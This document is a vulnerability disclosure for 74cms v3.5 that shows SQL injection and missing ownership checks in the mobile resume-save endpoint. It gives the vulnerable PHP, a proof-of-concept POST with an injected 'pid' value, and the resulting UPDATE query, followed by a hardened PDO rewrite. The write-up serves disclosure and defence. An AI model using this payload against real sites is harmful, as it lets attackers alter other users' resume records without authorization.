Server guard talent system SQL injection + unauthorized modification of anyone's resume
wap_user.php (act=resume_jobs_save):

    $setsqlarr['trade_cn'] = trim($_POST['trade_cn']) ? trim($_POST['trade_cn']) : exit("select the expected industry");
    $setsqlarr['district_cn'] = trim($_POST['district_cn']) ? trim($_POST['district_cn']) : exit("select the expected region");
    $setsqlarr['district'] = trim($_POST['district']);
    $setsqlarr['sdidstrict'] = trim($_POST['sdidstrict']);
    // $_POST['pid'] is interpolated straight into the WHERE clause, unfiltered
    if (!updatetable(table('resume'), $setsqlarr, "id = $_POST[pid]")) exit("err");
The call updatetable(table('resume'), $setsqlarr, "id = $_POST[pid]") builds the WHERE clause from $_POST['pid'] without any processing, so a simple "and 1=1" can be injected.
The primary key id of the resume record in the qs_resume table is never checked against the current user. In other words, the pid we submit selects any record for modification.
Access URL:
POST /74cms_v3.5.20.20151115/upload/wap/personal/wap_user.php?act=resume_jobs_save HTTP/1.1
Host: localhost
POST data: submit with pid=1 and 1=1
Captured SQL statement:
UPDATE qs_resume SET 'intention_jobs' = '\xCF\xFA\xCA\xDB\xD0\xD0\xD5\xFE\xC9\xCC\xCE\xF1/\xCF\xFA\xCA\xDB\xD0\xD0\xD5\xFE\xC8\xCB?', 'wage' = '59', 'wage_cn' = '2017~5000?/\xD4\xC2', 'nature' = '63', 'nature_cn' = '\xBC\xE6?', 'trade' = '5', 'trade_cn' = '\xCD\xF8\xC2\xE7\xD3\xCE?', 'district_cn' = '\xBA?\xB1?/\xBA\xAA\xB5\xA6\xCA\xD0', 'district' = '5', 'sdidstrict' = '000000' WHERE id = 1 and 1=1
With this, we can modify any resume record.
Solution:
Strengthen input filtering on the pid parameter before it reaches the query.
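A hardened rewrite of the update above, added here as an example and not 74cms's own code. It assumes a PDO connection, that the logged-in user's id is available to the caller, and that qs_resume has a uid column tying a resume to its owner (column name assumed).

```php
<?php
// Added example (not 74cms code). Fixes both problems in resume_jobs_save:
// the id is cast to an integer so "1 and 1=1" never reaches SQL, and the
// WHERE clause also requires the resume to belong to the current user, which
// closes the unauthorized-modification hole. Assumes qs_resume.uid exists.

function save_resume_jobs(PDO $db, array $post, int $currentUid): bool
{
    // Whitelist the columns a client may set; anything else in $post is ignored.
    $fields = [];
    foreach (['trade_cn', 'district_cn', 'district', 'sdidstrict'] as $col) {
        $fields[$col] = isset($post[$col]) ? trim($post[$col]) : '';
    }
    if ($fields['trade_cn'] === '') {
        exit("select the expected industry");
    }
    if ($fields['district_cn'] === '') {
        exit("select the expected region");
    }

    // Validate pid as an integer; "1 and 1=1" fails validation and is rejected.
    $pid = isset($post['pid']) ? filter_var($post['pid'], FILTER_VALIDATE_INT) : false;
    if ($pid === false) {
        exit("err");
    }

    // SET clause comes from the whitelist only; values are bound, not interpolated.
    $set = implode(', ', array_map(function ($c) {
        return "`$c` = :$c";
    }, array_keys($fields)));
    // Ownership predicate: even a valid id only updates the caller's own resume.
    $stmt = $db->prepare("UPDATE qs_resume SET $set WHERE id = :id AND uid = :uid");
    foreach ($fields as $col => $val) {
        $stmt->bindValue(":$col", $val);
    }
    $stmt->bindValue(':id', $pid, PDO::PARAM_INT);
    $stmt->bindValue(':uid', $currentUid, PDO::PARAM_INT);
    $stmt->execute();

    // Zero affected rows means the resume is not the caller's (or does not exist).
    return $stmt->rowCount() === 1;
}
```

Logging the rejected pid values (the filter_var failure path) gives a cheap detection signal for anyone probing this endpoint.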